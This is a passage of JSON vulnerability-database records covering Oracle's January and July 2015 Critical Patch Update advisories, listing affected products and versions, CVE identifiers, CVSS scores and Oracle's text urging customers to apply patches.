"Workspace Manager", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.40", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u6", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.2.2", "operator": "le"}, {"name": "Integrated Lights Out Manager(ILOM)", "version": "3.2.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.0.2.0", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.0.1.0", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "7.0", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.19", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2232", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.0", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.36", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.52", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "3.x", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Agile PLM for Process", "version": "6.1.0.3", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.21", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.4", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.2", "operator": "le"}, {"name": "Recovery", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "2.x", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.5", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.2.1.0", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.2.2", "operator": "le"}, {"name": "PL/SQL", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.24", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "4.0.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "5.0.3", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "2.0.6.2.0", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.3", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.1.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.3", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.1.1", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.3.6.0", "operator": "le"}, {"name": "MICROS Retail", "version": "4.8.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Waveset", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2011-4317", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-0231", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2013-6449", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2014-0076", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-5704", "CVE-2013-5605", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", "CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-1740", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-3470", "CVE-2012-0053", "CVE-2013-1739", "CVE-2014-6599", "CVE-2014-1492", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2013-5606", "CVE-2014-0114", "CVE-2015-0364", "CVE-2014-0050", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2014-1490", "CVE-2010-5298", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2014-0195", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-0198", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2014-0015", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", "CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2014-0118", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-1491", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-0117", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2014-0221", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "modified": "2015-01-20T00:00:00", "href": "", "id": "ORACLE:CPUJAN2015-1972971", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-18T20:24:06", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 193 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\n** Please note that on May 15, 2015, Oracle released [Security Alert for CVE-2015-3456 (QEMU \"Venom\")](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-3456-2542656.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2015-3456. **\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 1, "reporter": "Oracle", "published": "2015-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - July 2015", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [{"name": "Oracle WebCenter Portal", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Siebel Apps - E-Billing", "version": "6.1", "operator": "le"}, {"name": "Java SE, JavaFX, Java SE Embedded", "version": "8u33", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.6", "operator": "le"}, {"name": "Oracle VM Server for SPARC", "version": "3.2", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Hyperion Enterprise Performance Management Architect", "version": "11.1.2.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Java SE, JRockit, Java SE Embedded", "version": "8u33", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "3.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.1", "operator": "le"}, {"name": "RDBMS Scheduler", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.3", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.3", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2260", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "2.3", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.4", "operator": "le"}, {"name": "Java VM", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.4", "operator": "le"}, {"name": "Java SE, JRockit, Java SE Embedded", "version": "7u80", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "2.4", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "12.1.0.7", "operator": "le"}, {"name": "Sun Blade 6000 Ethernet Switched NEM 24P 10GE", "version": "1.2.2", "operator": "le"}, {"name": "Java SE, JavaFX, Java SE Embedded", "version": "2.2.80", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.1.0.7", "operator": "le"}, {"name": "RDBMS Partitioning", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.2", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "2.1.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Event Processing", "version": "11.1.1.7", "operator": "le"}, {"name": "RDBMS Scheduler", "version": "12.1.0.2", "operator": "le"}, {"name": "Data Store", "version": "11.2.5.2.42", "operator": "le"}, {"name": "Oracle Tuxedo", "version": "10.3", "operator": "le"}, {"name": "Java SE, JavaFX, Java SE Embedded", "version": "7u75", "operator": "le"}, {"name": "PeopleSoft Enteprise Portal - Interaction Hub", "version": "9.1.00", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.4", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.40", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM Candidate Gateway", "version": "9.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.32", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "11.1.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.6", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "RDBMS Scheduler", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iPlanet Web Proxy Server", "version": "4.0", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "12.1.0.6", "operator": "le"}, {"name": "Oracle Marketing", "version": "11.5.10.2", "operator": "le"}, {"name": "Sun Ray Software", "version": "5.4.4", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u33", "operator": "le"}, {"name": "Oracle Sourcing", "version": "12.2.4", "operator": "le"}, {"name": "Java SE, JavaFX, Java SE Embedded", "version": "6u95", "operator": "le"}, {"name": "Oracle OLAP", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.63", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.32", "operator": "le"}, {"name": "Technology stack", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "3.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "Oracle Switch ES1-24", "version": "1.3.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "3.1.1", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "3.1.2", "operator": "le"}, {"name": "Hyperion Common Security", "version": "11.1.2.2", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "RDBMS Support Tools", "version": "12.1.0.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u80", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "2.0.6.2", "operator": "le"}, {"name": "Oracle Application Express", "version": "4.2.3.00.08", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.2.2", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.4", "operator": "le"}, {"name": "Sun Network 10GE Switch 72p", "version": "1.2.2", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "2.2.2", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "11.1.1.3.0", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "11.1.2.4.0", "operator": "le"}, {"name": "Oracle Sourcing", "version": "12.1.3", "operator": "le"}, {"name": "RDBMS Scheduler", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.1.3", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle Application Express", "version": "5.0", "operator": "le"}, {"name": "RDBMS Support Tools", "version": "12.1.0.2", "operator": "le"}, {"name": "Siebel Core - Server OM Svcs", "version": "8.1.1", "operator": "le"}, {"name": "Java SE, JavaFX, Java SE Embedded", "version": "8u45", "operator": "le"}, {"name": "RDBMS Partitioning", "version": "11.2.0.3", "operator": "le"}, {"name": "Hyperion Enterprise Performance Management Architect", "version": "11.1.2.3", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.0.6", "operator": "le"}, {"name": "Data Store", "version": "11.2.5.3.28", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.22", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "7.0", "operator": "le"}, {"name": "Hyperion Common Security", "version": "11.1.2.3", "operator": "le"}, {"name": "Technology stack", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Agile Product Lifecycle Management for Process", "version": "6.2.0.0", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.23", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.4", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.24", "operator": "le"}, {"name": "RDBMS Support Tools", "version": "11.2.0.4", "operator": "le"}, {"name": "Technology stack", "version": "12.1.3", "operator": "le"}, {"name": "RDBMS Partitioning", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.0", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.3", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.6.1", "operator": "le"}, {"name": "Oracle Traffic Director", "version": "11.1.1.7.0", "operator": "le"}, {"name": "RDBMS Scheduler", "version": "11.1.0.7", "operator": "le"}, {"name": "Java SE", "version": "7u80", "operator": "le"}, {"name": "Java SE", "version": "8u45", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.2.0.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "Hyperion Common Security", "version": "11.1.2.4", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1120", "operator": "le"}, {"name": "Solaris", "version": "11.2", "operator": "le"}, {"name": "Oracle Tuxedo", "version": "11.1.1.2.2", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM Talent Acquisition Manager", "version": "9.1", "operator": "le"}, {"name": "Oracle Agile PLM Framework", "version": "9.3.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.3", "operator": "le"}, {"name": "RDBMS Partitioning", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle WebCenter Portal", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle Ethernet Switch ES2-72, Oracle Ethernet Switch ES2-64", "version": "1.9.1.2", "operator": "le"}, {"name": "RDBMS Security", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.30", "operator": "le"}, {"name": "Siebel Core - Server OM Svcs", "version": "15.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.2", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Communications Session Border Controller", "version": "7.2.0m4", "operator": "le"}, {"name": "Siebel Core - Server OM Svcs", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.9", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "6.1", "operator": "le"}, {"name": "Java SE, JRockit, Java SE Embedded", "version": "7u75", "operator": "le"}, {"name": "Siebel Apps - E-Billing", "version": "6.1.1", "operator": "le"}, {"name": "Integrated Lights Out Manager (ILOM)", "version": "9.4.2e", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.42", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u75", "operator": "le"}, {"name": "Java SE, JavaFX, Java SE Embedded", "version": "7u80", "operator": "le"}, {"name": "Java SE, JRockit, Java SE Embedded", "version": "28.3.6", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "6u95", "operator": "le"}, {"name": "Siebel UI Framework", "version": "15.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.22", "operator": "le"}, {"name": "Oracle Event Processing", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Agile Product Lifecycle Management for Process", "version": "6.1.0.3", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "12.2.1.0", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "7.0", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.3", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Data Store", "version": "11.2.5.1.29", "operator": "le"}, {"name": "Java SE, JRockit, Java SE Embedded", "version": "6u95", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Integrated Lights Out Manager (ILOM)", "version": "8.7.2.b", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u45", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Oracle Tuxedo", "version": "12.1.1.0", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "3.1", "operator": "le"}, {"name": "Siebel Apps - E-Billing", "version": "6.2", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "7.0", "operator": "le"}, {"name": "Oracle Application Express", "version": "4.2.1", "operator": "le"}, {"name": "Data Store", "version": "12.1.6.0.35", "operator": "le"}, {"name": "RDBMS Partitioning", "version": "12.1.0.2", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Web Cache", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Agile Product Lifecycle Management for Process", "version": "6.0.0.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.7", "operator": "le"}, {"name": "Java SE, JRockit, Java SE Embedded", "version": "8u45", "operator": "le"}, {"name": "Oracle OLAP", "version": "12.1.0.1", "operator": "le"}, {"name": "RDBMS Support Tools", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Sourcing", "version": "12.1.2", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.1", "operator": "le"}, {"name": "Hyperion Essbase", "version": "11.1.2.3", "operator": "le"}, {"name": "Oracle Agile Product Lifecycle Management for Process", "version": "6.1.1.5", "operator": "le"}, {"name": "Java SE", "version": "6u95", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.43", "operator": "le"}, {"name": "Oracle Sourcing", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Sourcing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "3.0.2", "operator": "le"}, {"name": "Hyperion Essbase", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.4", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.1", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM Talent Acquisition Manager", "version": "9.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM Candidate Gateway", "version": "9.2", "operator": "le"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-1926", "CVE-2015-1802", "CVE-2015-4000", "CVE-2015-2591", "CVE-2015-0443", "CVE-2015-1803", "CVE-2015-4771", "CVE-2015-2627", "CVE-2015-2615", "CVE-2014-3566", "CVE-2015-4764", "CVE-2015-4774", "CVE-2015-2601", "CVE-2015-4738", "CVE-2014-8098", "CVE-2015-0235", "CVE-2015-4729", "CVE-2015-1804", "CVE-2015-4751", "CVE-2015-0444", "CVE-2015-0445", "CVE-2015-4749", "CVE-2014-8092", "CVE-2015-4758", "CVE-2014-7809", "CVE-2015-2643", "CVE-2015-4770", "CVE-2015-4747", "CVE-2015-2661", "CVE-2015-4778", "CVE-2015-2632", "CVE-2015-2625", "CVE-2015-2617", "CVE-2015-4784", "CVE-2015-2664", "CVE-2015-2605", "CVE-2015-2597", "CVE-2015-4785", "CVE-2015-4732", "CVE-2015-2653", "CVE-2014-3572", "CVE-2014-3613", "CVE-2015-0206", "CVE-2014-0227", "CVE-2015-2595", "CVE-2015-4782", "CVE-2015-0286", "CVE-2015-3244", "CVE-2015-2648", "CVE-2015-2657", "CVE-2014-0230", "CVE-2014-8100", "CVE-2015-4789", "CVE-2015-2581", "CVE-2015-2613", "CVE-2015-2658", "CVE-2014-3571", "CVE-2015-4736", "CVE-2015-2599", "CVE-2013-2251", "CVE-2013-5704", "CVE-2015-4739", "CVE-2015-0288", "CVE-2015-4790", "CVE-2013-6422", "CVE-2015-2589", "CVE-2010-1324", "CVE-2015-2623", "CVE-2015-2631", "CVE-2010-4020", "CVE-2015-2596", "CVE-2015-4763", "CVE-2015-0285", "CVE-2015-4783", "CVE-2015-2620", "CVE-2015-2650", "CVE-2011-3389", "CVE-2015-2654", "CVE-2015-0207", "CVE-2015-2607", "CVE-2015-2639", "CVE-2015-2611", "CVE-2015-2645", "CVE-2015-2634", "CVE-2015-2594", "CVE-2014-8275", "CVE-2015-3456", "CVE-2015-0467", "CVE-2015-2584", "CVE-2015-0208", "CVE-2015-2808", "CVE-2013-0249", "CVE-2014-3570", "CVE-2015-2590", "CVE-2015-2656", "CVE-2015-2626", "CVE-2015-2628", "CVE-2015-4768", "CVE-2015-4761", "CVE-2015-4745", "CVE-2015-4750", "CVE-2014-0139", "CVE-2015-2635", "CVE-2015-4756", "CVE-2015-2647", "CVE-2014-3707", "CVE-2015-0293", "CVE-2015-2600", "CVE-2015-2580", "CVE-2014-8097", "CVE-2014-8101", "CVE-2015-2640", 